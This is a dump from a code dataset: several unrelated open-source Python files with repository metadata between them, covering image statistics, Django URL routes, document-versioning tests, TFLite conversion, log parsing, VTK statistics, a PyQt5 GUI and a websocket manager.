Parameters
----------
im_list : array of strings
Array where the first column is image_path (or image_url). Shape (N,).
"""
print 'Computing mean RGB pixel ...'
mean, std = np.zeros(3), np.zeros(3)
for i, filename in enumerate(im_list):
if verbose:# Write completion bar
n = 1. * i / len(im_list)
sys.stdout.write('\r')
sys.stdout.write("[{:20}] {}%".format('='*int(n/0.05), int(100*n)))
sys.stdout.flush()
# Process image
im = np.array(Image.open(filename)).reshape(-1, 3)
mean += np.mean(im, axis=0)
std += np.std(im, axis=0)
print ''
mean, std = mean / len(im_list), std / len(im_list)
return mean, std
| 38.751323 | 108 | 0.614145 |
5c71dd843ed45387db9266f95d3dd32129aea2ed | 1,260 | py | Python | djsani/dashboard/urls.py | carthagecollege/django-djsani | ad95158f443c9d4e0cd0cea2a99ebe7062d38ce5 | [
"BSD-3-Clause"
] | 1 | 2017-04-22T11:08:41.000Z | 2017-04-22T11:08:41.000Z | djsani/dashboard/urls.py | carthagecollege/django-djsani | ad95158f443c9d4e0cd0cea2a99ebe7062d38ce5 | [
"BSD-3-Clause"
] | 10 | 2020-06-11T14:22:47.000Z | 2021-07-08T14:05:27.000Z | djsani/dashboard/urls.py | carthagecollege/django-djsani | ad95158f443c9d4e0cd0cea2a99ebe7062d38ce5 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""URLs for all views."""
from django.urls import path
from django.views.generic import TemplateView
from djsani.dashboard import views
urlpatterns = [
path(
'success/',
TemplateView.as_view(template_name='dashboard/success.html'),
name='admin_success',
),
# generic send mail functions
path('send-mail/', views.sendmail, name='sendmail'),
# ajax communication to paint the panels
path('panels/', views.panels, name='dashboard_panels'),
# ajax returns students because using home view is a
# pain in the ass with security involved & spinner
path('get-students/', views.get_students, name='get_students'),
# simple ID search
path('student/', views.student_detail, name='search_students'),
# name search
path('student/search/', views.advanced_search, name='search_advanced'),
# student detail
path('student/<int:cid>/', views.student_detail, name='student_detail'),
# student detail content specific
path(
'student/<int:cid>/<str:medium>/<str:content_type>/',
views.student_detail,
name='student_detail_medium',
),
# home
path('', views.home, name='dashboard_home'),
]
| 33.157895 | 77 | 0.649206 |
30eda8de5b211d49b8c4f3fb728c81ac58984920 | 2,528 | py | Python | mayan/apps/documents/tests/test_document_version_views.py | prezi/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 4 | 2019-02-17T08:35:42.000Z | 2019-03-28T06:02:11.000Z | mayan/apps/documents/tests/test_document_version_views.py | zhoubear/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 1 | 2018-10-11T13:01:34.000Z | 2018-10-11T13:01:34.000Z | mayan/apps/documents/tests/test_document_version_views.py | prezi/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 3 | 2019-01-29T13:21:57.000Z | 2019-10-27T03:20:15.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from ..permissions import (
permission_document_version_revert, permission_document_version_view,
)
from .base import GenericDocumentViewTestCase
from .literals import (
TEST_SMALL_DOCUMENT_PATH, TEST_VERSION_COMMENT
)
class DocumentVersionTestCase(GenericDocumentViewTestCase):
def setUp(self):
super(DocumentVersionTestCase, self).setUp()
self.login_user()
def test_document_version_list_no_permission(self):
with open(TEST_SMALL_DOCUMENT_PATH, 'rb') as file_object:
self.document.new_version(
comment=TEST_VERSION_COMMENT, file_object=file_object
)
response = self.get(
'documents:document_version_list', args=(self.document.pk,)
)
self.assertEqual(response.status_code, 403)
def test_document_version_list_with_access(self):
self.grant_access(
obj=self.document, permission=permission_document_version_view
)
with open(TEST_SMALL_DOCUMENT_PATH, 'rb') as file_object:
self.document.new_version(
comment=TEST_VERSION_COMMENT, file_object=file_object
)
response = self.get(
'documents:document_version_list', args=(self.document.pk,)
)
self.assertContains(response, TEST_VERSION_COMMENT, status_code=200)
def test_document_version_revert_no_permission(self):
first_version = self.document.latest_version
with open(TEST_SMALL_DOCUMENT_PATH, 'rb') as file_object:
self.document.new_version(
file_object=file_object
)
response = self.post(
'documents:document_version_revert', args=(first_version.pk,)
)
self.assertEqual(response.status_code, 403)
self.assertEqual(self.document.versions.count(), 2)
def test_document_version_revert_with_access(self):
first_version = self.document.latest_version
with open(TEST_SMALL_DOCUMENT_PATH, 'rb') as file_object:
self.document.new_version(
file_object=file_object
)
self.grant_access(
obj=self.document, permission=permission_document_version_revert
)
response = self.post(
'documents:document_version_revert', args=(first_version.pk,),
)
self.assertEqual(response.status_code, 302)
self.assertEqual(self.document.versions.count(), 1)
| 31.209877 | 76 | 0.673655 |
00e8b0a28942bdc952adb5621866db271145ed70 | 326 | py | Python | project files/model_conv.py | onkark98/Parkinsons_Predictor_Project | e34cfa01715a3ef9428a8d2751881581c3d4911d | [
"MIT"
] | null | null | null | project files/model_conv.py | onkark98/Parkinsons_Predictor_Project | e34cfa01715a3ef9428a8d2751881581c3d4911d | [
"MIT"
] | null | null | null | project files/model_conv.py | onkark98/Parkinsons_Predictor_Project | e34cfa01715a3ef9428a8d2751881581c3d4911d | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
from tensorflow import keras
from tensorflow import lite
keras_file = "/home/subhranil/Train_Models/weights-improvement-992-0.1720.hdf5"
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
open("demo.tflite","wb").write(tflite_model)
| 32.6 | 79 | 0.819018 |
2dd5c70e231448e686f07c88fd8d40992a65e4e9 | 23,482 | py | Python | Examples/Infovis/Python/haruspex.py | b3c/VTK-5.8 | 9ad0280c669d2ad87a4ed521994f561cfa824337 | [
"BSD-3-Clause"
] | 2 | 2020-01-07T20:50:53.000Z | 2020-01-29T18:22:02.000Z | Examples/Infovis/Python/haruspex.py | carthurs/VTK-5.8.0 | fcaa03b2107687b72fa208b380a0134b10a0cedc | [
"BSD-3-Clause"
] | null | null | null | Examples/Infovis/Python/haruspex.py | carthurs/VTK-5.8.0 | fcaa03b2107687b72fa208b380a0134b10a0cedc | [
"BSD-3-Clause"
] | 2 | 2019-03-11T07:22:19.000Z | 2019-12-12T11:25:04.000Z | ############################################################
# Copyright 2010 Sandia Corporation.
# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,
# the U.S. Government retains certain rights in this software.
############################################################
# Contact: Philippe Pebay, Sandia National Laboratories, pppebay@sandia.gov
############################################################
############################################################
from vtk import *
import sys
import getopt
############################################################
############################################################
# Global variable for convenience
verbosity = 0
############################################################
############################################################
# Usage function
def Usage( outModelPrefix, outDataName ):
print "Usage:"
print "\t [-h] Help: print this message and exit"
print "\t -d <filename> name of CSV input data file"
print "\t [-c <filename>] name of CSV file specifying columns of interest. Default: all columns are of interest"
print "\t -e <engine> Type of statistics engine. Available engines are:"
print "\t descriptive"
print "\t order"
print "\t contingency"
print "\t correlative"
print "\t multicorrelative"
print "\t pca"
print "\t kmeans"
print "\t [-o <bitcode>] Engine options bitcode. Default is 0. Available bits are:"
print "\t 1st bit: assess"
print "\t 2nd bit: test"
print "\t [-m <prefix>] prefix of CSV input model file(s). Default: calculate model from scratch"
print "\t [-u] update input model (if data are provided as well). NB: update happens before assessment"
print "\t [-s <prefix>] prefix of CSV output model (statistics) file(s)"
print "\t [-a <filename>] name of CSV output data (annotated) file"
print "\t [-t <filename>] name of CSV statistical test results file"
print "\t [-v] Increase verbosity (from no flag = silent to -vvv = print all tables)"
sys.exit( 1 )
############################################################
############################################################
# Parse command line
def ParseCommandLine():
# Declare use of global variable
global verbosity
# Default values
options = 0
inDataName = ""
inModelPrefix = ""
updateModel = False
haruspexName = ""
outModelPrefix = ""
outDataName = ""
outTestName = ""
columnsListName =""
# Try to hash command line with respect to allowable flags
try:
opts,args = getopt.getopt(sys.argv[1:], 'hd:e:o:m:us:a:t:c:v')
except getopt.GetoptError:
Usage( outModelPrefix, outDataName )
sys.exit( 1 )
# First verify that the helper has not been requested (supersedes everything else)
# NB: handled first and separately so default values cannot be altered in helper message
for o,a in opts:
if o == "-h":
Usage( outModelPrefix, outDataName )
# Parse arguments and assign corresponding variables
for o,a in opts:
if o == "-d":
inDataName = a
elif o == "-e":
haruspexName = a
elif o == "-o":
options = a
elif o == "-m":
inModelPrefix = a
elif o == "-u":
updateModel = True
elif o == "-s":
outModelPrefix = a
elif o == "-a":
outDataName = a
elif o == "-t":
outTestName = a
elif o == "-c":
columnsListName = a
elif o == "-v":
verbosity += 1
if not inDataName:
print "ERROR: a data file name required!"
sys.exit( 1 )
if not haruspexName:
print "ERROR: a statistics engine name is required!"
sys.exit( 1 )
if verbosity > 0:
print "# Parsed command line:"
print " Input data file:", inDataName
if inModelPrefix != "":
print " Input model file prefix:", inModelPrefix
else:
print " No input model"
print " Statistics:", haruspexName
if columnsListName != "":
print " Columns of interest in file:", columnsListName
else:
print " Columns of interest: all"
print " Output data file:", outDataName
print " Output model file prefix:", outModelPrefix
print
return [ inDataName, \
inModelPrefix, \
updateModel, \
columnsListName, \
haruspexName, \
options, \
outDataName, \
outTestName, \
outModelPrefix ]
############################################################
############################################################
# Turn haruspex name into vtkStatistics object and ancillary parameters
def InstantiateStatistics( haruspexName ):
# Declare use of global variable
global verbosity
if haruspexName == "descriptive":
haruspex = vtkDescriptiveStatistics()
elif haruspexName == "order":
haruspex = vtkOrderStatistics()
elif haruspexName == "contingency":
haruspex = vtkContingencyStatistics()
elif haruspexName == "correlative":
haruspex = vtkCorrelativeStatistics()
elif haruspexName == "multicorrelative":
haruspex = vtkMultiCorrelativeStatistics()
elif haruspexName == "pca":
haruspex = vtkPCAStatistics()
elif haruspexName == "kmeans":
haruspex = vtkKMeansStatistics()
else:
print "ERROR: Invalid statistics engine:", haruspexName
sys.exit( 1 )
if verbosity > 0:
print "# Instantiated a", haruspex.GetClassName(), "object"
print
return haruspex
############################################################
############################################################
# Read input CSV model table as input port
def ReadInModelTable( inModelPrefix, tabIndex ):
# Declare use of global variable
global verbosity
if verbosity > 0:
print "# Reading input model table", tabIndex
# Set CSV reader parameters
inTableReader = vtkDelimitedTextReader()
inTableReader.SetFieldDelimiterCharacters(",")
inTableReader.SetHaveHeaders( True )
inTableReader.SetDetectNumericColumns( True )
inTableReader.SetFileName( inModelPrefix + "-" + str( tabIndex ) + ".csv" )
inTableReader.Update()
if verbosity > 0:
table = inTableReader.GetOutput()
print " Number of columns:", table.GetNumberOfColumns()
print " Number of rows:", table.GetNumberOfRows()
if verbosity > 1:
inTableReader.GetOutput().Dump( 16 )
print
return inTableReader
############################################################
############################################################
# Read input CSV data as input port
def ReadInData( inDataName ):
# Declare use of global variable
global verbosity
if verbosity > 0:
print "# Reading input data"
# Set CSV reader parameters
inDataReader = vtkDelimitedTextReader()
inDataReader.SetFieldDelimiterCharacters(",")
inDataReader.SetHaveHeaders( True )
inDataReader.SetDetectNumericColumns( True )
inDataReader.SetFileName( inDataName )
inDataReader.Update()
if verbosity > 0:
table = inDataReader.GetOutput()
print " Number of columns:", table.GetNumberOfColumns()
print " Number of rows:", table.GetNumberOfRows()
print
if verbosity > 2:
print "# Input data:"
inDataReader.GetOutput().Dump( 16 )
print
return inDataReader
############################################################
############################################################
# Read list of columns of interest
def ReadColumnsList( columnsListName ):
# Declare use of global variable
global verbosity
if verbosity > 0:
print "# Reading list of columns of interest:"
# Set CSV reader parameters
columnsListReader = vtkDelimitedTextReader()
columnsListReader.SetFieldDelimiterCharacters(",")
columnsListReader.SetHaveHeaders( False )
columnsListReader.SetDetectNumericColumns( True )
columnsListReader.SetFileName( columnsListName )
columnsListReader.Update()
# Figure number of columns of interest
table = columnsListReader.GetOutput()
n = table.GetNumberOfColumns()
if verbosity > 0:
print " Number of columns of interest:", n
# Now construct list of colums of interest
columnsList = []
for i in range( 0, n ):
columnsList.append( table.GetColumn( i ).GetValue( 0 ) )
if verbosity > 1:
print " Columns of interest are:", columnsList
if verbosity > 0:
print
return columnsList
############################################################
############################################################
# Write table from haruspex output port (i.e., for data or tests)
def WriteOutTable( haruspex, outPort, outFileName, outPortName, threshold ):
# Declare use of global variable
global verbosity
if outFileName == "":
if verbosity > 0:
print "# No output table of", outPortName, "required"
print
return
if verbosity > 0:
print "# Saving output table of", outPortName
# Set CSV writer parameters
outTableWriter = vtkDelimitedTextWriter()
outTableWriter.SetFieldDelimiter(",")
outTableWriter.SetFileName( outFileName )
outTableWriter.SetInputConnection( haruspex.GetOutputPort( outPort ) )
outTableWriter.Update()
if verbosity > 0:
print " Wrote", outPortName
if verbosity > threshold:
haruspex.GetOutput( outPort ).Dump( 16 )
print
############################################################
############################################################
# Write haruspex output model
def WriteOutModel( haruspex, outModelPrefix ):
# Declare use of global variable
global verbosity
if outModelPrefix == "":
if verbosity > 0:
print "# No output model (statistics) required"
print
return
if verbosity > 0:
print "# Saving output model (statistics):"
# Set CSV writer parameters
outModelWriter = vtkDelimitedTextWriter()
outModelWriter.SetFieldDelimiter(",")
# Verify that model is a vtkMultiBlockDataSet, error out otherwise
outModelType = haruspex.GetOutputDataObject( 1 ).GetClassName()
if outModelType != "vtkMultiBlockDataSet":
print "ERROR: unsupported type of output model!"
sys.exit( 1 )
# Must iterate over all blocks of the vtkMultiBlockDataSet
outModel = haruspex.GetOutputDataObject( 1 )
n = outModel.GetNumberOfBlocks()
for i in range( 0, n ):
# Straightforward CSV file dump of a vtkTable
outModelName = outModelPrefix + "-" + str( i )+ ".csv"
outModelWriter.SetFileName( outModelName )
table = outModel.GetBlock( i )
outModelWriter.SetInput( table )
outModelWriter.Update()
if verbosity > 0:
print " Wrote", outModelName
if verbosity > 1:
table.Dump( 16 )
print
############################################################
############################################################
# Calculate statistics
def CalculateStatistics( inDataReader, inModelReader, updateModel, columnsList, haruspex, options ):
# Declare use of global variable
global verbosity
if verbosity > 0:
print "# Calculating statistics:"
# Output port of data reader becomes input connection of haruspex
haruspex.AddInputConnection( inDataReader.GetOutputPort() )
# Get the output table of the data reader, which becomes the input data
inData = inDataReader.GetOutput()
# Figure number of columns of interest. If no list was provided, use them all
if columnsList == []:
columnsList = range( 0, inData.GetNumberOfColumns() )
n = len( columnsList )
# Generate list of columns of interest, depending on number of variables
if haruspex.IsA( "vtkUnivariateStatisticsAlgorithm" ):
# Univariate case: one request for each columns
for i in range( 0, n ):
colName = inData.GetColumnName( columnsList[i] )
if verbosity > 0:
print " Requesting column", colName
haruspex.AddColumn( colName )
elif haruspex.IsA( "vtkBivariateStatisticsAlgorithm" ):
# Bivariate case: generate all possible pairs
for i in range( 0, n ):
colNameX = inData.GetColumnName( columnsList[i] )
for j in range( i+1, n ):
colNameY = inData.GetColumnName( columnsList[j] )
if verbosity > 0:
print " Requesting column pair (", colNameX, ",", colNameY, ")"
haruspex.AddColumnPair( colNameX, colNameY )
else:
# Multivariate case: generate single request containing all columns
for i in range( 0, n ):
colName = inData.GetColumnName( columnsList[i] )
haruspex.SetColumnStatus( colName, 1 )
if verbosity > 0:
print " Adding column", colName, "to the request"
# Complete column selection request
haruspex.RequestSelectedColumns()
# Figure which options were requested
if int( options ) % 2:
assessOption = True
if verbosity > 0:
print " Assess option is on"
else:
assessOption = False
if verbosity > 0:
print " Assess option is off"
options = int( options ) >> 1
if int( options ) % 2:
haruspex.SetTestOption( True )
if verbosity > 0:
print " Test option is on"
else:
haruspex.SetTestOption( False )
if verbosity > 0:
print " Test option is off"
if verbosity > 0:
print
# If an input model was provided, then update it first, otherwise run in a single pass
if inModelReader == None:
# No model reader: then Learn, Derive, and possibly Assess in a single pass
haruspex.SetLearnOption( True )
haruspex.SetDeriveOption( True )
haruspex.SetAssessOption( assessOption )
haruspex.Update()
else:
# Model readers are available: decide how many tables will be fetched
nPrimaryTables = haruspex.GetNumberOfPrimaryTables()
# Then create vtkMultiBlockDataSet with correspondingly many blocks
inModel = vtkMultiBlockDataSet()
inModel.SetNumberOfBlocks( nPrimaryTables )
# Now iterate over all readers to obtain tables
for t in range( 0, nPrimaryTables ):
inTableReader = inModelReader[t]
inTable = inTableReader.GetOutput()
# Handle special case of second table of order statistics
if ( t > 0 and haruspex.GetClassName() == "vtkOrderStatistics" ):
if verbosity > 0:
print "# Converting input order table to appropriate column types"
# Create a programmable filter whose input is the order table
convertOrderTab = vtkProgrammableFilter()
convertOrderTab.SetInput( inTable )
# Define table converter callback for programmable filter
def ConvertOrderTableCallback():
readTable = convertOrderTab.GetInput()
convTable = convertOrderTab.GetOutput()
# Create columns with appropriate names and formats
kCol = vtkIdTypeArray()
kCol.SetName( "Key" )
convTable.AddColumn( kCol )
xCol = vtkStringArray()
xCol.SetName( "Value" )
convTable.AddColumn( xCol )
cCol = vtkIdTypeArray()
cCol.SetName( "Cardinality" )
convTable.AddColumn( cCol )
# Loop over all input rows and create output rows
nRow = readTable.GetNumberOfRows()
row = vtkVariantArray()
row.SetNumberOfValues( 3 )
for r in range( 0, nRow ):
# Retrieve primary statistics and convert to correct type
k = readTable.GetValueByName( r, "Key" ).ToInt()
row.SetValue( 0, k )
x = readTable.GetValueByName( r, "Value" ).ToString()
row.SetValue( 1, x )
c = readTable.GetValueByName( r, "Cardinality" ).ToInt()
row.SetValue( 2, c )
convTable.InsertNextRow( row )
# Set callback and run programmable filer
convertOrderTab.SetExecuteMethod( ConvertOrderTableCallback )
convertOrderTab.Update()
# Retrieve converted table from filter output
inTable = convertOrderTab.GetOutput()
if verbosity > 1:
inTable.Dump( 16 )
# Handle special case of second table of contingency statistics
if ( t > 0 and haruspex.GetClassName() == "vtkContingencyStatistics" ):
if verbosity > 0:
print "# Converting input contingency table to appropriate column types"
# Create a programmable filter whose input is the contingency table
convertContingencyTab = vtkProgrammableFilter()
convertContingencyTab.SetInput( inTable )
# Define table converter callback for programmable filter
def ConvertContingencyTableCallback():
readTable = convertContingencyTab.GetInput()
convTable = convertContingencyTab.GetOutput()
# Create columns with appropriate names and formats
kCol = vtkIdTypeArray()
kCol.SetName( "Key" )
convTable.AddColumn( kCol )
xCol = vtkStringArray()
xCol.SetName( "x" )
convTable.AddColumn( xCol )
yCol = vtkStringArray()
yCol.SetName( "y" )
convTable.AddColumn( yCol )
cCol = vtkIdTypeArray()
cCol.SetName( "Cardinality" )
convTable.AddColumn( cCol )
# Loop over all input rows and create output rows
nRow = readTable.GetNumberOfRows()
row = vtkVariantArray()
row.SetNumberOfValues( 4 )
for r in range( 0, nRow ):
# Retrieve primary statistics and convert to correct type
k = readTable.GetValueByName( r, "Key" ).ToInt()
row.SetValue( 0, k )
x = readTable.GetValueByName( r, "x" ).ToString()
row.SetValue( 1, x )
y = readTable.GetValueByName( r, "y" ).ToString()
row.SetValue( 2, y )
c = readTable.GetValueByName( r, "Cardinality" ).ToInt()
row.SetValue( 3, c )
convTable.InsertNextRow( row )
# Set callback and run programmable filer
convertContingencyTab.SetExecuteMethod( ConvertContingencyTableCallback )
convertContingencyTab.Update()
# Retrieve converted table from filter output
inTable = convertContingencyTab.GetOutput()
if verbosity > 1:
inTable.Dump( 16 )
# Set retrieved table to corresponding model block
inModel.SetBlock( t, inTable )
# If model update is required, then learn new model and aggregate, otherwise assess directly
if updateModel == True:
# Store model it for subsequent aggregation
collection = vtkDataObjectCollection()
collection.AddItem( inModel )
# Then learn a new primary model (do not derive nor assess)
haruspex.SetLearnOption( True )
haruspex.SetDeriveOption( False )
haruspex.SetAssessOption( False )
haruspex.Update()
# Aggregate old and new models
collection.AddItem( haruspex.GetOutputDataObject( 1 ) )
aggregated = vtkMultiBlockDataSet()
haruspex.Aggregate( collection, aggregated )
# Finally, derive and possibly assess using the aggregated model (do not learn)
haruspex.SetInput( 2, aggregated )
haruspex.SetLearnOption( False )
haruspex.SetDeriveOption( True )
haruspex.SetAssessOption( assessOption )
haruspex.Update()
else:
# Only derive and possibly assess using the input model (do not aggregate)
haruspex.SetInput( 2, inModel )
haruspex.SetLearnOption( False )
haruspex.SetDeriveOption( True )
haruspex.SetAssessOption( assessOption )
haruspex.Update()
print
############################################################
############################################################
# Main function
def main():
# Parse command line
[ inDataName, \
inModelPrefix, \
updateModel, \
columnsListName, \
haruspexName, \
options, \
outDataName, \
outTestName, \
outModelPrefix ] = ParseCommandLine()
# Verify that haruspex name makes sense and if so instantiate accordingly
haruspex = InstantiateStatistics( haruspexName )
# Set input data reader
inDataReader = ReadInData( inDataName )
# Set input model readers if prefix was provided
if inModelPrefix != "":
inModelReader = []
nPrimaryTables = haruspex.GetNumberOfPrimaryTables()
for t in range( 0, nPrimaryTables ):
tableReader = ReadInModelTable( inModelPrefix, t )
inModelReader.append( tableReader )
else:
inModelReader = None
# Read list of columns of interest
if columnsListName:
columnsList = ReadColumnsList( columnsListName )
else:
columnsList = []
# Calculate statistics
CalculateStatistics( inDataReader, inModelReader, updateModel, columnsList, haruspex, options )
# Save output (annotated) data
WriteOutTable( haruspex, 0, outDataName, "annotated data", 2 )
# Save output of statistical tests
WriteOutTable( haruspex, 2, outTestName, "statistical test results", 1 )
# Save output model (statistics)
WriteOutModel( haruspex, outModelPrefix )
############################################################
############################################################
if __name__ == "__main__":
main()
############################################################
| 37.332273 | 119 | 0.551657 |
f35cef6e907251065f70168d1c83142b17183731 | 546 | py | Python | parsechat.py | steamroller-airmash/statsbot-log-tools | ae062b195d3ef587ad6e61ba3e7b89890805903a | [
"MIT"
] | null | null | null | parsechat.py | steamroller-airmash/statsbot-log-tools | ae062b195d3ef587ad6e61ba3e7b89890805903a | [
"MIT"
] | null | null | null | parsechat.py | steamroller-airmash/statsbot-log-tools | ae062b195d3ef587ad6e61ba3e7b89890805903a | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import logparser
import sys
if len(sys.argv) < 2:
print("usage parsechat <logfile>")
sys.exit(-1)
with open(sys.argv[1], 'r', errors='ignore') as file:
names = {}
for entry in logparser.parse_log(file):
if entry['record_type'] == "PLAYER_NEW":
names[entry['id']] = entry['name']
elif entry['record_type'] == "PLAYER_LEAVE":
names.pop(entry['id'], None)
elif entry['record_type'] == "CHAT_PUBLIC":
print(names[entry['id']] + ": " + entry['text'])
| 26 | 60 | 0.57326 |
44b21ac1a9f9bd2dd64c0cf355c229a42813cef8 | 4,281 | py | Python | docs/pyqt/widzety/gui_z5.py | damiankarol7/python101 | 1978a9402a8fb0f20c4ca7bd542cb8d7d4501b9b | [
"MIT"
] | 44 | 2015-02-11T19:10:37.000Z | 2021-11-11T09:45:43.000Z | docs/pyqt/widzety/gui_z5.py | damiankarol7/python101 | 1978a9402a8fb0f20c4ca7bd542cb8d7d4501b9b | [
"MIT"
] | 9 | 2015-02-06T21:26:25.000Z | 2022-03-31T10:44:22.000Z | docs/pyqt/widzety/gui_z5.py | damiankarol7/python101 | 1978a9402a8fb0f20c4ca7bd542cb8d7d4501b9b | [
"MIT"
] | 172 | 2015-06-13T07:16:24.000Z | 2022-03-30T20:41:11.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from ksztalty import Ksztalty, Ksztalt
from PyQt5.QtWidgets import QHBoxLayout
from PyQt5.QtWidgets import QCheckBox, QButtonGroup, QVBoxLayout
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QSlider, QLCDNumber, QSplitter
from PyQt5.QtWidgets import QRadioButton, QGroupBox
from PyQt5.QtWidgets import QComboBox, QSpinBox
from PyQt5.QtWidgets import QPushButton
class Ui_Widget(object):
""" Klasa definiująca GUI """
def setupUi(self, Widget):
# widgety rysujące kształty, instancje klasy Ksztalt
self.ksztalt1 = Ksztalt(self, Ksztalty.Polygon)
self.ksztalt2 = Ksztalt(self, Ksztalty.Ellipse)
self.ksztaltAktywny = self.ksztalt1
# przyciski CheckBox ###
uklad = QVBoxLayout() # układ pionowy
self.grupaChk = QButtonGroup()
for i, v in enumerate(('Kwadrat', 'Koło', 'Trójkąt', 'Linia')):
self.chk = QCheckBox(v)
self.grupaChk.addButton(self.chk, i)
uklad.addWidget(self.chk)
self.grupaChk.buttons()[self.ksztaltAktywny.ksztalt].setChecked(True)
# CheckBox do wyboru aktywnego kształtu
self.ksztaltChk = QCheckBox('<=')
self.ksztaltChk.setChecked(True)
uklad.addWidget(self.ksztaltChk)
# układ poziomy dla kształtów oraz przycisków CheckBox
ukladH1 = QHBoxLayout()
ukladH1.addWidget(self.ksztalt1)
ukladH1.addLayout(uklad)
ukladH1.addWidget(self.ksztalt2)
# koniec CheckBox ###
# Slider i LCDNumber ###
self.suwak = QSlider(Qt.Horizontal)
self.suwak.setMinimum(0)
self.suwak.setMaximum(255)
self.lcd = QLCDNumber()
self.lcd.setSegmentStyle(QLCDNumber.Flat)
# układ poziomy (splitter) dla slajdera i lcd
ukladH2 = QSplitter(Qt.Horizontal, self)
ukladH2.addWidget(self.suwak)
ukladH2.addWidget(self.lcd)
ukladH2.setSizes((125, 75))
# przyciski RadioButton ###
self.ukladR = QHBoxLayout()
for v in ('R', 'G', 'B'):
self.radio = QRadioButton(v)
self.ukladR.addWidget(self.radio)
self.ukladR.itemAt(0).widget().setChecked(True)
# grupujemy przyciski
self.grupaRBtn = QGroupBox('Opcje RGB')
self.grupaRBtn.setLayout(self.ukladR)
self.grupaRBtn.setObjectName('Radio')
self.grupaRBtn.setCheckable(True)
# układ poziomy dla grupy Radio
ukladH3 = QHBoxLayout()
ukladH3.addWidget(self.grupaRBtn)
# koniec RadioButton ###
# Lista ComboBox i SpinBox ###
self.listaRGB = QComboBox(self)
for v in ('R', 'G', 'B'):
self.listaRGB.addItem(v)
self.listaRGB.setEnabled(False)
# SpinBox
self.spinRGB = QSpinBox()
self.spinRGB.setMinimum(0)
self.spinRGB.setMaximum(255)
self.spinRGB.setEnabled(False)
# układ pionowy dla ComboBox i SpinBox
uklad = QVBoxLayout()
uklad.addWidget(self.listaRGB)
uklad.addWidget(self.spinRGB)
# do układu poziomego grupy Radio dodajemy układ ComboBox i SpinBox
ukladH3.insertSpacing(1, 25)
ukladH3.addLayout(uklad)
# koniec ComboBox i SpinBox ###
# przyciski PushButton ###
uklad = QHBoxLayout()
self.grupaP = QButtonGroup()
self.grupaP.setExclusive(False)
for v in ('R', 'G', 'B'):
self.btn = QPushButton(v)
self.btn.setCheckable(True)
self.grupaP.addButton(self.btn)
uklad.addWidget(self.btn)
# grupujemy przyciski
self.grupaPBtn = QGroupBox('Przyciski RGB')
self.grupaPBtn.setLayout(uklad)
self.grupaPBtn.setObjectName('Push')
self.grupaPBtn.setCheckable(True)
self.grupaPBtn.setChecked(False)
# koniec PushButton ###
# główny układ okna, wertykalny ###
ukladOkna = QVBoxLayout()
ukladOkna.addLayout(ukladH1)
ukladOkna.addWidget(ukladH2)
ukladOkna.addLayout(ukladH3)
ukladOkna.addWidget(self.grupaPBtn)
self.setLayout(ukladOkna) # przypisanie układu do okna głównego
self.setWindowTitle('Widżety')
| 36.279661 | 77 | 0.63957 |
241f32c80eb32955dc5e73fb9b33f38fc9dde4e4 | 552 | py | Python | tools/rename.py | xta0/Python-Playground | 513ebd2ad7f0a8c69f2f04b4f7524b31e76fa5bc | [
"MIT"
] | null | null | null | tools/rename.py | xta0/Python-Playground | 513ebd2ad7f0a8c69f2f04b4f7524b31e76fa5bc | [
"MIT"
] | null | null | null | tools/rename.py | xta0/Python-Playground | 513ebd2ad7f0a8c69f2f04b4f7524b31e76fa5bc | [
"MIT"
] | null | null | null | import os
import sys
walk_dir = sys.argv[1]
for root, subdirs, files in os.walk(walk_dir):
for filename in files:
if filename.endswith((".pb.cc", ".pb.h")):
filepath = os.path.join(root,filename)
name = filename.split('.')[0]
print(name)
newName = ""
if filename.endswith(".cc"):
newName = name+".cc"
else:
newName = name+".h"
newFilePath = os.path.join(root, newName)
os.rename(filepath, newFilePath)
| 29.052632 | 53 | 0.512681 |
46c52454498ad961f6cbfb3b8893135ca5f97378 | 4,075 | py | Python | neuron/factory.py | tomforge/Neuron | 21278d125c9c507319ea01366eb44e46646e0926 | [
"Apache-2.0"
] | null | null | null | neuron/factory.py | tomforge/Neuron | 21278d125c9c507319ea01366eb44e46646e0926 | [
"Apache-2.0"
] | 21 | 2018-05-14T15:32:42.000Z | 2018-07-22T06:36:38.000Z | neuron/factory.py | tomforge/Neuron | 21278d125c9c507319ea01366eb44e46646e0926 | [
"Apache-2.0"
] | null | null | null | import logging
logger = logging.getLogger("server")
from autobahn.twisted.websocket import WebSocketServerFactory
from neuron import utils
class WSManagerFactory(WebSocketServerFactory):
"""
Manages all websocket clients and connections. All
interactions with clients should be made through this class.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# A map of connected clients' addresses to their protocol instances
self.clients = {}
# A map of subscribers to their set of subscribed events
self.subscribers = {}
# A map of events to their set of subscribers
self.eventSubscriptions = {}
def registerClient(self, client):
self.clients[client.peer] = client
def unregisterClient(self, client):
try:
self.clients.pop(client.peer)
except KeyError:
logger.error(
"Unregistering a client that was never registered: {}".format(client.peer))
def addSubscription(self, subscriber, event):
"""
Subscribe the given subscriber to the given event.
Whenever the given event is received, the subscriber
will be notified via the notify() function
"""
if subscriber not in self.subscribers:
self.subscribers[subscriber] = {event}
else:
self.subscribers[subscriber].add(event)
if event not in self.eventSubscriptions:
self.eventSubscriptions[event] = {subscriber}
else:
self.eventSubscriptions[event].add(subscriber)
def removeSubscription(self, subscriber, event=None):
"""
Stop notifying the given subscriber about the given event.
If event is None, remove subscriber from all events.
"""
try:
if event is None:
events = self.subscribers.pop(subscriber)
for event in events:
self.eventSubscriptions[event].remove(subscriber)
if not self.eventSubscriptions[event]:
self.eventSubscriptions.pop(event)
else:
self.subscribers[subscriber].remove(event)
if not self.subscribers[subscriber]:
self.subscribers.pop(subscriber)
self.eventSubscriptions[event].remove(subscriber)
if not self.eventSubscriptions[event]:
self.eventSubscriptions.pop(event)
except KeyError:
